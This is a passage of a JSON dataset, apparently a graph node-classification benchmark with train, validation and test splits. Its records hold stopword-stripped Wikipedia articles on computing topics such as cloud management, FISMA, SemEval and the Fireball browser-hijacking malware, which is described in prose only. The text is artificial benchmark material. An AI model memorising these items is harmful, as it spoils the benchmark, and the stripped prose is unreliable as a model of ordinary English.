customizable cloud computing presents number management challenges companies using public clouds ownership equipment hosting cloud environment environment contained within networks public cloud customers full visibility control users public cloud services must also integrate architecture defined cloud provider using specific parameters working cloud components integration includes tying cloud apis configuring ip addresses subnets firewalls data service functions storage control functions based cloud provider ’ infrastructure services public cloud users must integrate cloud infrastructure management capacity management challenge public private cloud environments end users ability deploy applications using self-service portals applications sizes may appear environment consume unpredictable amount resources disappear time possible solution profiling applications impact computational resources result performance models allow prediction resource utilization changes according application patterns thus resources dynamically scaled meet expected demand critical cloud providers need provision resources quickly meet growing demand applications charge-back—or pricing resource use granular basis—is challenge public private cloud environments charge-back challenge public cloud service providers must price services competitively still creating profit users public cloud services may find charge-back challenging difficult groups assess actual resource costs granular basis due overlapping resources within organization may paid individual business unit electrical power private cloud operators charge-back fairly straightforward challenge lies guessing allocate resources closely possible actual resource usage achieve greatest operational efficiency exceeding budgets risk hybrid cloud environments combine public private cloud services sometimes traditional infrastructure elements present set management challenges include security concerns sensitive data lands public cloud servers budget concerns around overuse storage bandwidth proliferation mismanaged images managing information flow hybrid cloud environment also significant challenge on-premises clouds must share information applications hosted off-premises public cloud providers information may change constantly hybrid cloud environments also typically include complex mix policies permissions limits must managed consistently across public private clouds cmps provide means cloud service customer manage deployment operation applications associated datasets across multiple cloud service infrastructures including on-premises cloud infrastructure public cloud service provider infrastructure words cmps provide management capabilities hybrid cloud multi-cloud environments cloud management platform cmp provides broad cloud management functionality atop public cloud provider platforms private cloud platforms cmps manage cloud services resources distributed across multiple cloud platforms value cmps stands delivering maximum level consistency platforms without compromising depth functionality unfortunately meaning term cloud management platform cmp evolved past decade precise meaning term often unclear discussions management strategy one vendor using term may mean something completely different another selecting right management approach cloud services therefore complex task providers vendors confuse evaluation highlighting strengths avoiding weaknesses furthermore provider vendor focuses solving different aspects cloud management making difficult compare solutions minimum viable cmp must able provide support technology stack layers orchestrate capabilities across iaas paas saas etc must include cloud-agnostic tool support portability/migration across hybrid clouds integration framework take advantage existing automation tools used internally combine new cmp features ability provide native container support across virtual technologies prerequisite cmps either container ‘ native ’ architected using containers reengineered support containers along standard os deployments cmp ’ blueprinting function enable administrators create provide image-based solutions customized configurations integration assets databases cmdb role-based access control governance key consolidated control plane operations one primary roles cmp integration existing application lifecycle tools hypervisors cloud platforms given charter cmps must integrate internal external systems manage multi-cloud services ability support published apis provide customization needed critical capability key areas integration include like brokerage firm cloud services brokerage csb manages cloud services clients gartner explains csbs play intermediary role cloud computing management process since many datacenters hosting provided applications role service broker becomes important choosing suitable data center serve received request cloud services brokerages consolidate cloud services one sources allow customers access services one portal",
    "neighbors": [
      4802,
      4194,
      911,
      8592,
      18,
      5848
    ],
    "mask": "None"
  },
  {
    "node_id": 5771,
    "label": 2,
    "text": "John_Quarterman:john quarterman john s. quarterman born april 27 1954 american author long time internet participant wrote one classic books networking prior commercialization internet also written risk management quarterman grew bemiss community near valdosta georgia usa first used arpanet 1974 attending harvard worked unix arpanet software bbn original prime contractor arpanet 1977 1981 twice elected board directors usenix association professional association related unix operating system board instrumental vote 1987 approve first funding received uunet along psinet became one first two commercial internet service providers isps co-founded first internet consulting firm texas tic 1986 co-founded one first isps austin zilker internet park since sold jump point founder tispa texas isp association founder chief technology officer matrix netsystems inc. established matrix information directory services mids 1990 quarterman published first maps whole internet conducted first internet demographic survey started first continuing series performance data entire internet 1993 web since 1995 internet weather report also visible internet average plus comparisons isps visible isp ratings inter ctive week listed john quarterman one 25 unsung heroes internet 1998 saying ... president mids quarterman 43 net demographics gallup organization opinion polls internet world interviewed quarterman length full page picture june 1996 issue surveyors cyberspace september 21 2006 quarterman served panelist hank hultquist michele chaboudy joint meeting ieee central texas section communications signal processing chapters titled network neutrality altruism capitalism st. edward university austin texas also organized november 2 2006 panel net neutrality eff-austin featuring quarterman hank hultquist michael hathaway austin bay",
    "neighbors": [
      3526,
      7561,
      8671,
      8395,
      8012,
      2061,
      9452,
      11689,
      5492,
      8631,
      9151,
      3551
    ],
    "mask": "Test"
  },
  {
    "node_id": 5772,
    "label": 7,
    "text": "Space-based_architecture:space-based architecture space-based architecture sba software architecture pattern achieving linear scalability stateful high-performance applications using tuple space paradigm follows many principles representational state transfer rest service-oriented architecture soa event-driven architecture eda well elements grid computing space-based architecture applications built set self-sufficient units known processing-units pu units independent application scale adding units sba model closely related patterns proved successful addressing application scalability challenge shared nothing architecture sn used google amazon.com well-known companies model also applied many firms securities industry implementing scalable electronic securities trading applications application built principles space-based architecture typically following components articles/papers technical",
    "neighbors": [
      8122,
      11393,
      5956,
      7175,
      9225,
      4107,
      333,
      337,
      50,
      4817,
      3990,
      9782,
      7802,
      2011
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5773,
    "label": 4,
    "text": "Richard_Proto:richard proto richard proto noted american cryptographer former director research advanced technology united states national security agency elected nsa hall honor 2013 proto born fair section new connecticut graduated wilbur cross high school 1958 member 1958 team new england high school basketball championship boston garden proto received bachelor degree mathematics fairfield university 1962 master degree mathematics boston college 1964 proto joined united states national security agency nsa 1964 cryptologic mathematician communications security research development organization dedicated next thirty-five years nsa served key roles research organization operational side information security worked security component design security system architectures vulnerability finding risk management proto eventually served nsa director research advanced technology 1994 1999 proto credited creating nsa applied mathematics program train mathematicians apply knowledge range problems beyond traditional cryptologic mission also created laboratory telecommunications sciences focus resources mastering network technology proto authored 28 technical papers nsa responsible invention several information security devices two patented name career proto received presidential rank award distinguished service national intelligence distinguished service medal 2009 proto recognized nsa naming richard c. proto symposium center within nsa compound fort george g. meade maryland second time nsa formally named one facilities 2013 proto elected nsa hall honor 2013 distinguished service american cryptology",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 5774,
    "label": 4,
    "text": "Security_service_(telecommunication):security service telecommunication security service service provided layer communicating open systems ensures adequate security systems data transfers defined itu-t x.800 recommendation x.800 iso 7498-2 information processing systems – open systems interconnection – basic reference model – part 2 security architecture technically aligned model widely recognized general definition cnss instruction 4009 dated 26 april 2010 committee national security systems united states america another authoritative definition w3c web service glossary adopted nist sp 800-95 information security computer security disciplines dealing requirements confidentiality integrity availability so-called cia triad information asset organization company agency information managed computers respectively threats attack resources information devices manage exploiting one vulnerabilities resources protected one countermeasures security controls security services implement part countermeasures trying achieve security requirements organization order let different devices computers routers cellular phones communicate data standardized way communication protocols defined itu-t organization published large set protocols general architecture protocols defined recommendation x.200 different means air cables ways protocols protocol stacks communicate called communication network security requirements applicable information sent network discipline dealing security network called network security x.800 recommendation recommendation extends field application recommendation x.200 cover secure communications open systems according x.200 recommendation so-called osi reference model 7 layers one generically called n layer n+1 entity ask transmission services n entity level two entities n-entity interact means n protocol transmitting protocol data units pdu service data unit sdu specific unit data passed osi layer lower layer yet encapsulated pdu lower layer set data sent user services given layer transmitted semantically unchanged peer service user pdu given layer layer n sdu layer layer n-1 effect sdu 'payload given pdu process changing sdu pdu consists encapsulation process performed lower layer data contained sdu becomes encapsulated within pdu layer n-1 adds headers footers sdu transforming pdu layer n-1 added headers footers part process used make possible get data source destination following considered security services provided optionally within framework osi reference model authentication services require authentication information comprising locally stored information data transferred credentials facilitate authentication security services may provided means security mechanism table1/x.800 shows relationships services mechanisms applied connection oriented protocols connectionless protocols table 2/x.800 illustrates relationship security services layers managed security service mss network security services outsourced service provider",
    "neighbors": [
      9345,
      6403,
      5636,
      6406,
      3473,
      10909,
      10915,
      10020,
      939,
      7983,
      11567,
      2737,
      8881,
      8122,
      9926,
      1479,
      1480,
      3529,
      9932,
      4689,
      2901,
      1369,
      731,
      1890,
      612,
      7528,
      2539,
      9710,
      3698,
      9714,
      2294,
      5880,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5775,
    "label": 9,
    "text": "Simulation_language:simulation language computer simulation language used describe operation simulation computer two major types simulation continuous discrete event though modern languages handle complex combinations languages also graphical interface least simple statistic gathering capability analysis results important part discrete-event languages ability generate pseudo-random numbers variants different probability distributions",
    "neighbors": [
      2242,
      2691,
      8262,
      10568,
      5582,
      5584,
      7186,
      1301,
      4985
    ],
    "mask": "Test"
  },
  {
    "node_id": 5776,
    "label": 4,
    "text": "Fireball_(software):fireball software fireball browser hijacking malware discovered security company check point takes target browsers turns zombies check point claims discovered fireball malware 2017 microsoft claims tracking malware since 2015 malware tracked chinese company called rafotech digital marketing agency based beijing bundling legitimate software provide users programs rafotech bundled fireball software deal wifi mustang browser sosodesk fvp image viewer rafotech claims 300 million users similar estimated number infections worldwide denies uses fake search engines security researchers dispute claim noting rafotech may also purchased additional distribution means threat actors fake search engines popular 14 ranked among top 10,000 websites reaching top 1,000 malware ability running code victim computers downloading arbitrary file hijacking manipulating infected user web traffic order generate advertisement revenue installs plugins additional configurations boost advertisements potential turn distributor additional malware malware spread mostly via bundling installed victim machine alongside wanted program often without user ’ consent digital marketing agency rafotech indicated producer software company accused host fake search engines redirect queries yahoo.com google.com fake search engines include tracking pixels used collect private information users fireball manipulates infected browsers turn default search engines home pages mentioned fake search engines enable software spy users infected browsers fireball malware conform usual characteristics bundled software check point asserts “ malware fake search engines ’ carry indicators connecting rafotech uninstalled ordinary user conceal true nature. ” furthermore fireball “ displays great sophistication quality evasion techniques including anti-detection capabilities multilayer structure flexible c c. ” another deception use legitimate-seeming digital certificates rafotech ’ fake search engines malware ’ carry identifying marks program capability run arbitrary code download applications harvest sensitive information banking medical details cyber criminals could leverage source code create new types malware estimated 250 million computers infected worldwide check point researches also claim malware might infected computers 20 corporate networks making high volume internet threat according source highest infection rates discovered indonesia india brazil speculated related browser hijackers operations form possibly largest infection operation history table 1 top countries infected fireball malware dispute numbers according microsoft tracking malware since 2015 results based fireball infections cleaned windows defender malicious software removal tool based collected data total infections 40 million check point researchers used number visits malware-carrying search pages device check ’ infected first open web browser 1 verify home-pages set 2 modify home-page 3 check default search engine verify modify 4 check browser extensions installed 1 use adware removal tool 2 remove unknown add-ons browser 3 restore browsers default settings",
    "neighbors": [
      7515,
      8668,
      5935
    ],
    "mask": "Test"
  },
  {
    "node_id": 5777,
    "label": 4,
    "text": "DriveSavers:drivesavers drivesavers inc. computer hardware data recovery digital forensics electronic discovery firm located novato california founded ceo jay hagan former company president scott gaidano 1985 1985 former jasmine technologies executives jay hagan scott gaidano founded drivesavers operating gaidano ’ condo 1,400 drivesavers originally offered hard drive repair data recovery services company dropped drive repair services within first eight months 1992 drivesavers signed agreement supermac technology assume technical support warranty obligations supermac mass storage products company merged data recovery disk repair 1994 retained drivesavers name 2008 drivesavers invested two million dollars build series five iso-certified cleanrooms disassemble rebuild damaged hard drives 2004-2009 company grew 35 85 employees drivesavers also works secretive branches government celebrities order provide comfort assistance clients upset stressed data loss situation drivesavers staff individual data crisis counselor counselor experience working suicide hotline drivesavers recovery firm licensed every major hard-drive manufacturer work drive void warranty recover data hard disk drives solid state drives smart phones servers digital camera media ios devices drivesavers certified hipaa-compliant undergoes annual reviews encryption training certificates guardianedge pgp pointsec utimaco diamond certified 2013–18 storage visions visionary company award 2014 flash memory summit innovative flash memory consumer application award 2018",
    "neighbors": [
      9569,
      8283,
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 5778,
    "label": 0,
    "text": "Named_entity:named entity information extraction named entity real-world object persons locations organizations products etc. denoted proper name abstract physical existence examples named entities include barack obama new york city volkswagen golf anything else named named entities simply viewed entity instances e.g. new york city instance city historical perspective term named entity coined muc-6 evaluation campaign contained enamex entity name expressions e.g persons locations organizations numex numerical expression formal definition derived rigid designator saul kripke expression named entity word named aims restrict possible set entities one many rigid designators stands referent designator rigid designates thing every possible world contrary flaccid designators may designate different things different possible worlds example consider sentence trump president united states trump united states named entities since refer specific objects donald trump united states however president named entity since used refer many different objects different worlds different presidential periods referring different persons even different countries organizations referring different people rigid designators usually include proper names well certain natural terms like biological species substances also general agreement named entity recognition community consider named entities temporal numerical expressions amounts money types units may violate rigid designator perspective task recognizing named entities text named entity recognition task determining identity named entities mentioned text called named entity disambiguation tasks require dedicated algorithms resources addressed",
    "neighbors": [
      293,
      9577,
      2059,
      396,
      10716
    ],
    "mask": "None"
  },
  {
    "node_id": 5779,
    "label": 1,
    "text": "NexusDB:nexusdb nexusdb relational commercial database engine delphi c++ builder .net programming languages created nexusdb pty ltd developed successor turbopower flashfiler system delphi still available free download database engine supports standard alongside core sql functionality well direct cursor based data access nexusdb also provides database connectors easy access various development application environments website client/server trial edition online manual free version without source code embedded/single user downloaded via getit tool rad studio xe8 newer sql based third party database development tool database workbench developed upscene productions.. third party support exists fast report reportbuilder reporting tools",
    "neighbors": [
      10921,
      6797,
      7022,
      7983,
      10413,
      3573,
      10389,
      9177,
      10459
    ],
    "mask": "None"
  },
  {
    "node_id": 5780,
    "label": 4,
    "text": "Federal_Information_Security_Management_Act_of_2002:federal information security management act 2002 federal information security modernization act 2002 fisma et seq united states federal law enacted 2002 title iii e-government act 2002 act recognized importance information security economic national security interests united states act requires federal agency develop document implement agency-wide program provide information security information information systems support operations assets agency including provided managed another agency contractor source fisma brought attention within federal government cybersecurity explicitly emphasized risk-based policy cost-effective security fisma requires agency program officials chief information officers inspectors general igs conduct annual reviews agency information security program report results office management budget omb omb uses data assist oversight responsibilities prepare annual report congress agency compliance act fy 2008 federal agencies spent 6.2 billion securing government total information technology investment approximately 68 billion 9.2 percent total information technology portfolio law replaced federal information security modernization act 2014 sometimes known fisma2014 fisma reform fisma2014 struck subchapters ii iii chapter 35 title 44 united states code amending text new law new subchapter ii fisma assigns specific responsibilities federal agencies national institute standards technology nist office management budget omb order strengthen information security systems particular fisma requires head agency implement policies procedures cost-effectively reduce information technology security risks acceptable level according fisma term information security means protecting information information systems unauthorized access use disclosure disruption modification destruction order provide integrity confidentiality availability accordance fisma nist responsible developing standards guidelines associated methods techniques providing adequate information security agency operations assets excluding national security systems nist works closely federal agencies improve understanding implementation fisma protect information information systems publishes standards guidelines provide foundation strong information security programs agencies nist performs statutory responsibilities computer security division information technology laboratory nist develops standards metrics tests validation programs promote measure validate security information systems services nist hosts following fisma defines framework managing information security must followed information systems used operated u.s. federal government agency executive legislative branches contractor organization behalf federal agency branches framework defined standards guidelines developed nist fisma requires agencies information systems inventory place according fisma head agency shall develop maintain inventory major information systems including major national security systems operated control agency identification information systems inventory subsection shall include identification interfaces system systems networks including operated control agency first step determine constitutes information system question direct mapping computers information system rather information system may collection individual computers put common purpose managed system owner nist sp 800-18 revision 1 guide developing security plans federal information systems provides guidance determining system boundaries information information systems categorized based objectives providing appropriate levels information security according range risk levels first mandatory security standard required fisma legislation fips 199 standards security categorization federal information information systems provides definitions security categories guidelines provided nist sp 800-60 guide mapping types information information systems security categories overall fips 199 system categorization high water mark impact rating criteria information types resident system example one information type system rating low confidentiality integrity availability another type rating low confidentiality availability rating moderate integrity impact level integrity also becomes moderate federal information systems must meet minimum security requirements requirements defined second mandatory security standard required fisma legislation fips 200 minimum security requirements federal information information systems organizations must meet minimum security requirements selecting appropriate security controls assurance requirements described nist special publication 800-53 recommended security controls federal information systems process selecting appropriate security controls assurance requirements organizational information systems achieve adequate security multifaceted risk-based activity involving management operational personnel within organization agencies flexibility applying baseline security controls accordance tailoring guidance provided special publication 800-53 allows agencies adjust security controls closely fit mission requirements operational environments controls selected planned must documented system security plan combination fips 200 nist special publication 800-53 requires foundational level security federal information information systems agency risk assessment validates security control set determines additional controls needed protect agency operations including mission functions image reputation agency assets individuals organizations nation resulting set security controls establishes level security due diligence federal agency contractors risk assessment starts identifying potential threats vulnerabilities mapping implemented controls individual vulnerabilities one determines risk calculating likelihood impact given vulnerability could exploited taking account existing controls culmination risk assessment shows calculated risk vulnerabilities describes whether risk accepted mitigated mitigated implementation control one needs describe additional security controls added system nist also initiated information security automation program isap security content automation protocol scap support complement approach achieving consistent cost-effective security control assessments agencies develop policy system security planning process nist sp-800-18 introduces concept system security plan system security plans living documents require periodic review modification plans action milestones implementing security controls procedures place outlining reviews plans keeps plan current follows planned security controls system security plan major input security certification accreditation process system security certification accreditation process system security plan analyzed updated accepted certification agent confirms security controls described system security plan consistent fips 199 security category determined information system threat vulnerability identification initial risk determination identified documented system security plan risk assessment equivalent document system documentation risk assessment completed system controls must reviewed certified functioning appropriately based results review information system accredited certification accreditation process defined nist sp 800-37 guide security certification accreditation federal information systems security accreditation official management decision given senior agency official authorize operation information system explicitly accept risk agency operations agency assets individuals based implementation agreed-upon set security controls required omb circular a-130 appendix iii security accreditation provides form quality control challenges managers technical staffs levels implement effective security controls possible information system given mission requirements technical constraints operational constraints cost/schedule constraints accrediting information system agency official accepts responsibility security system fully accountable adverse impacts agency breach security occurs thus responsibility accountability core principles characterize security accreditation essential agency officials complete accurate trustworthy information possible security status information systems order make timely credible risk-based decisions whether authorize operation systems information supporting evidence needed security accreditation developed detailed security review information system typically referred security certification security certification comprehensive assessment management operational technical security controls information system made support security accreditation determine extent controls implemented correctly operating intended producing desired outcome respect meeting security requirements system results security certification used reassess risks update system security plan thus providing factual basis authorizing official render security accreditation decision accredited systems required monitor selected set security controls system documentation updated reflect changes modifications system large changes security profile system trigger updated risk assessment controls significantly modified may need re-certified continuous monitoring activities include configuration management control information system components security impact analyses changes system ongoing assessment security controls status reporting organization establishes selection criteria subsequently selects subset security controls employed within information system assessment organization also establishes schedule control monitoring ensure adequate coverage achieved security experts bruce brody former federal chief information security officer alan paller director research sans institute described fisma well-intentioned fundamentally flawed tool arguing compliance reporting methodology mandated fisma measures security planning rather measuring information security past gao chief technology officer keith rhodes said fisma helped government system security implementation everything security people view fisma checklist nothing going get done",
    "neighbors": [
      5636,
      8968,
      5002,
      678,
      7979,
      3759,
      7345,
      8881,
      3773,
      575,
      6211,
      10437,
      10821,
      5192,
      6224,
      5589,
      9688,
      4826,
      6367,
      3552,
      612,
      6372,
      7528,
      635,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5781,
    "label": 0,
    "text": "SemEval:semeval semeval semantic evaluation ongoing series evaluations computational semantic analysis systems evolved senseval word sense evaluation series evaluations intended explore nature meaning language meaning intuitive humans transferring intuitions computational analysis proved elusive series evaluations providing mechanism characterize precise terms exactly necessary compute meaning evaluations provide emergent mechanism identify problems solutions computations meaning exercises evolved articulate dimensions involved use language began apparently simple attempts identify word senses computationally evolved investigate interrelationships among elements sentence e.g. semantic role labeling relations sentences e.g. coreference nature saying semantic relations sentiment analysis purpose semeval senseval exercises evaluate semantic analysis systems semantic analysis refers formal analysis meaning computational refer approaches principle support effective implementation first three evaluations senseval-1 senseval-3 focused word sense disambiguation time growing number languages offered tasks number participating teams beginning fourth workshop semeval-2007 semeval-1 nature tasks evolved include semantic analysis tasks outside word sense disambiguation triggered conception *sem conference semeval community decided hold evaluation workshops yearly association *sem conference also decision every evaluation task run every year e.g none wsd tasks included semeval-2012 workshop earliest days assessing quality word sense disambiguation wsd algorithms primarily matter intrinsic evaluation “ almost attempts made evaluate embedded wsd components ” recently extrinsic evaluations begun provide evidence value wsd end-user applications 1990 discussions sense disambiguation task focused mainly illustrative examples rather comprehensive evaluation early 1990s saw beginnings systematic rigorous intrinsic evaluations including formal experimentation small sets ambiguous words april 1997 martha palmer marc light organized workshop entitled tagging lexical semantics conjunction conference applied natural language processing time clear recognition manually annotated corpora revolutionized areas nlp part-of-speech tagging parsing corpus-driven approaches potential revolutionize automatic semantic analysis well kilgarriff recalled “ high degree consensus field needed evaluation ” several practical proposals resnik yarowsky kicked discussion led creation senseval evaluation exercises semeval-2010 many participants feel 3-year cycle long wait many shared tasks conference natural language learning conll recognizing textual entailments rte run annually reason semeval coordinators gave opportunity task organizers choose 2-year 3-year cycle semeval community favored 3-year cycle br although votes within semeval community favored 3-year cycle organizers coordinators settled split semeval task 2 evaluation workshops triggered introduction new *sem conference semeval organizers thought would appropriate associate event *sem conference collocate semeval workshop *sem conference organizers got positive responses task coordinators/organizers participants association yearly *sem 8 tasks willing switch 2012 thus born semeval-2012 semeval-2013 current plan switch yearly semeval schedule associate *sem conference every task needs run every year framework semeval/senseval evaluation workshops emulates message understanding conferences mucs evaluation workshops ran arpa advanced research projects agency renamed defense advanced research projects agency darpa stages semeval/senseval evaluation workshops senseval-1 senseval-2 focused evaluation wsd systems major languages available corpus computerized dictionary senseval-3 looked beyond lexemes started evaluate systems looked wider areas semantics semantic roles technically known theta roles formal semantics logic form transformation commonly semantics phrases clauses sentences represented first-order logic forms senseval-3 explored performances semantics analysis machine translation types different computational semantic systems grew beyond coverage wsd senseval evolved semeval aspects computational semantic systems evaluated semeval exercises provide mechanism examining issues semantic analysis texts topics interest fall short logical rigor found formal computational semantics attempting identify characterize kinds issues relevant human understanding language primary goal replicate human processing means computer systems tasks shown developed individuals groups deal identifiable issues take concrete form first major area semantic analysis identification intended meaning word level taken include idiomatic expressions word-sense disambiguation concept evolving away notion words discrete senses rather characterized ways used i.e. contexts tasks area include lexical sample all-word disambiguation multi- cross-lingual disambiguation lexical substitution given difficulties identifying word senses tasks relevant topic include word-sense induction subcategorization acquisition evaluation lexical resources second major area semantic analysis understanding different sentence textual elements fit together tasks area include semantic role labeling semantic relation analysis coreference resolution tasks area look specialized issues semantic analysis temporal information processing metonymy resolution sentiment analysis tasks area many potential applications information extraction question answering document summarization machine translation construction thesauri semantic networks language modeling paraphrasing recognizing textual entailment potential applications contribution types semantic analysis constitutes outstanding research issue example word sense induction disambiguation task three separate phases unsupervised evaluation wsi considered two types evaluation v measure rosenberg hirschberg 2007 paired f-score artiles et al. 2009 evaluation follows supervised evaluation semeval-2007 wsi task agirre soroa 2007 tables reflects workshop growth senseval semeval gives overview area computational semantics evaluated throughout senseval/semeval workshops multilingual wsd task introduced semeval-2013 workshop task aimed evaluating word sense disambiguation systems multilingual scenario using babelnet sense inventory unlike similar task like crosslingual wsd multilingual lexical substitution task fixed sense inventory specified multilingual wsd uses babelnet sense inventory prior development babelnet bilingual lexical sample wsd evaluation task carried semeval-2007 chinese-english bitexts cross-lingual wsd task introduced semeval-2007 evaluation workshop re-proposed semeval-2013 workshop facilitate ease integrating wsd systems natural language processing nlp applications machine translation multilingual information retrieval cross-lingual wsd evaluation task introduced language-independent knowledge-lean approach wsd task unsupervised word sense disambiguation task english nouns means parallel corpora follows lexical-sample variant classic wsd task restricted 20 polysemous nouns worth noting semeval-2014 two tasks multilingual/crosslingual i.e l2 writing assistant task crosslingual wsd task includes english spanish german french dutch ii multilingual semantic textual similarity task evaluates systems english spanish texts major tasks semantic evaluation include following areas natural language processing list expected grow field progresses following table shows areas studies involved senseval-1 semeval-2014 refers senseval se refers semeval e.g s1 refers senseval-1 se07 refers semeval2007 semeval tasks created many types semantic annotations type various schema semeval-2015 organizers decided group tasks together several tracks tracks type semantic annotations task hope achieve lists type semantic annotations involved semeval workshops task track allocation flexible task might develop track e.g taxonomy evaluation task semeval-2015 learning semantic relations track semeval-2016 dedicated track semantic taxonomy new semantic taxonomy enrichment task",
    "neighbors": [
      8843,
      396,
      5399,
      538,
      3617,
      293,
      7724,
      2223,
      3504,
      7599,
      1214,
      1737,
      5197,
      9935,
      11348,
      6745,
      7780,
      9702,
      887,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 5782,
    "label": 8,
    "text": "WS-Transaction:ws-transaction ws-transaction web services specification developed bea systems ibm microsoft ws-transaction specification describes coordination types used extensible coordination framework described ws-coordination specification defines two coordination types atomic transaction individual operations business activity ba long running transactions developers use either coordination types building applications require consistent agreement outcome distributed activities",
    "neighbors": [
      3323,
      10020,
      5789,
      7878
    ],
    "mask": "Test"
  },
  {
    "node_id": 5783,
    "label": 9,
    "text": "First-class_function:first-class function computer science programming language said first-class functions treats functions first-class citizens means language supports passing functions arguments functions returning values functions assigning variables storing data structures programming language theorists require support anonymous functions function literals well languages first-class functions names functions special status treated like ordinary variables function type term coined christopher strachey context functions first-class citizens mid-1960s first-class functions necessity functional programming style use higher-order functions standard practice simple example higher-ordered function map function takes arguments function list returns list formed applying function member list language support map must support passing function argument certain implementation difficulties passing functions arguments returning results especially presence non-local variables introduced nested anonymous functions historically termed funarg problems name coming function argument early imperative languages problems avoided either supporting functions result types e.g algol 60 pascal omitting nested functions thus non-local variables e.g c early functional language lisp took approach dynamic scoping non-local variables refer closest definition variable point function executed instead defined proper support lexically scoped first-class functions introduced scheme requires handling references functions closures instead bare function pointers turn makes garbage collection necessity section compare particular programming idioms handled functional language first-class functions haskell compared imperative language functions second-class citizens c languages functions first-class citizens functions passed arguments functions way values function taking another function argument called higher-order function language haskell languages functions first-class often still allow one write higher-order functions use features function pointers delegates language c two samples number differences two approaches directly related support first-class functions haskell sample operates lists c sample operates arrays natural compound data structures respective languages making c sample operate linked lists would made unnecessarily complex also accounts fact c function needs additional parameter giving size array c function updates array in-place returning value whereas haskell data structures persistent new list returned old left intact haskell sample uses recursion traverse list c sample uses iteration natural way express function languages haskell sample could easily expressed terms fold c sample terms recursion finally haskell function polymorphic type supported c fixed type variables type constant codice_1 languages supporting anonymous functions pass function argument higher-order function language support anonymous functions bind name instead anonymous nested functions becomes natural refer variables outside body called non-local variables functions represented bare function pointers know anymore value outside function body passed closure needs built manually therefore speak first-class functions also note codice_2 specialized functions referring two codice_1s outside environment set generally requires boilerplate code codice_4 would nested function would still run problem reason supported c. returning function fact returning closure c example local variables captured closure go scope return function builds closure forcing closure later point result undefined behaviour possibly corrupting stack known upwards funarg problem assigning functions variables storing inside global datastructures potentially suffers difficulties returning functions one test literals values equality natural ask whether programming language support testing functions equality inspection question appears difficult one distinguish several types function equality type theory type functions accepting values type returning values type b may written → b b curry-howard correspondence function types related logical implication lambda abstraction corresponds discharging hypothetical assumptions function application corresponds modus ponens inference rule besides usual case programming functions type theory also uses first-class functions model associative arrays similar data structures category-theoretical accounts programming availability first-class functions corresponds closed category assumption instance simply typed lambda calculus corresponds internal language cartesian closed categories functional programming languages scheme ml haskell f scala first-class functions lisp one earliest functional languages designed aspects first-class functions properly understood resulting functions dynamically scoped later scheme common lisp dialects lexically scoped first-class functions many scripting languages including perl python php lua tcl/tk javascript io first-class functions imperative languages distinction made algol descendants pascal traditional c family modern garbage-collected variants algol family allowed nested functions higher-order taking function arguments higher-order functions return functions results except algol 68 allows reason known deal non-local variables nested-function returned result algol 68 produces runtime errors cases c family allowed passing functions arguments returning results avoided problems supporting nested functions gcc compiler allows extension usefulness returning functions primarily lies ability return nested functions captured non-local variables instead top-level functions languages generally considered first-class functions modern imperative languages often support garbage-collection making implementation first-class functions feasible first-class functions often supported later revisions language including c 2.0 apple blocks extension c c++ objective-c. c++11 added support anonymous functions closures language non-garbage collected nature language special care taken non-local variables functions returned results see",
    "neighbors": [
      1152,
      2304,
      898,
      2817,
      4101,
      3462,
      8582,
      9,
      1673,
      8587,
      9739,
      9866,
      2062,
      655,
      6160,
      10510,
      8082,
      5395,
      3733,
      2585,
      11674,
      1435,
      10395,
      3613,
      5917,
      6047,
      7326,
      9245,
      10145,
      3876,
      5796,
      5031,
      4777,
      5885,
      1963,
      428,
      5677,
      2045,
      692,
      11574,
      9914,
      8251,
      6718,
      8644,
      8262,
      6087,
      5833,
      1610,
      1611,
      8524,
      5456,
      7292,
      7889,
      9680,
      10581,
      10198,
      7513,
      7386,
      219,
      11226,
      6239,
      10083,
      10211,
      8037,
      6502,
      10470,
      4840,
      2666,
      8554,
      3702,
      3960,
      3705,
      7931,
      2556,
      2557
    ],
    "mask": "Train"
  },
  {
    "node_id": 5784,
    "label": 7,
    "text": "MobileMe:mobileme mobileme branded itools 2000 2002 .mac 2008 discontinued subscription-based collection online services software offered apple inc. services gradually transitioned eventually replaced free icloud mobileme ceased june 30 2012 transfers icloud available july 31 2012 data available download date site finally closed completely date data deleted email addresses accounts transferred icloud marked unused originally launched january 5 2000 itools free collection internet-based services mac os 9 users apple relaunched .mac july 17 2002 became paid subscription service primarily designed mac os x users apple relaunched service mobileme july 9 2008 targeting mac os x microsoft windows iphone ipod touch users february 24 2011 apple discontinued offering mobileme retail stores later resellers new subscriptions also stopped october 12 2011 apple launched icloud replace mobileme new users current users access june 30 2012 service cease itools .mac designed primarily provide internet services mac owners members itools .mac received mac.com email address showing services tied mac hardware however release iphone 3g 2008 renamed service mobileme began providing internet services os x ios windows members mobileme given me.com email address though users current mac.com email address could also continue use domains interchangeable email account also longer restricted os x software mail ical could access personal data computer connected internet using web interface me.com number supported applications including microsoft outlook long user used version 2003 later apple support mobileme available via chat telephone latter restricted us/canada users mobileme allowed users track location ios devices via web portal me.com user could see device approximate location map along circle showing radius inaccuracy display message and/or play sound device even set silent change password device remotely erase contents app also released apple allowed users locate iphone another device running ios 4 feature first announced june 10 2009 included ios 3.0 feature mobileme users find iphone made free charge release ios 4.2.1 software update november 22 2010 devices introduced 2010 mobileme two different plans individual plan included 20 gb email file storage 200 gb monthly data transfer family pack plan included 40 gb storage split among one 20 gb individual primary four 5 gb sub-accounts sub-account email address online storage able use mobileme features family members also shared folder idisk could share access data among primary account sub-accounts read/write access folder limited free space available primary user idisk individual plan priced 99 family pack —at 149 members could buy additional storage 20 gb 40 gb allocations however sub-account storage could upgraded family account amount storage designated per account notes mail app mac computer notes app iphone synced via mobileme service however unable viewed edited online lists controlled mail app ical app mac computer viewable editable mobileme website calendar tab viewable editable iphone announcement ios 4 sync notes imap including mobileme implemented mobileme maintained synchronized address book calendar feature using push functions user made change contact event one device automatically synced mobileme servers extension user devices supported devices included iphone address book ical os x microsoft outlook 2003 later microsoft windows subscription calendars ical mac computer viewable online mobileme service although birthdays viewable online gathered information address book rather caldav icalendar .ics subscription calendars conversely iphone birthdays contacts iphone viewable calendar app method except looking individually contacts birthdays calendar added ios 4.3 subscription calendars available view calendar adding settings mail contacts calendar add account mobileme public photo video gallery feature photos videos could uploaded web browser me.com synced iphoto aperture os x uploaded iphone ipod touch users could also upload movies within applications available mac including iphoto imovie 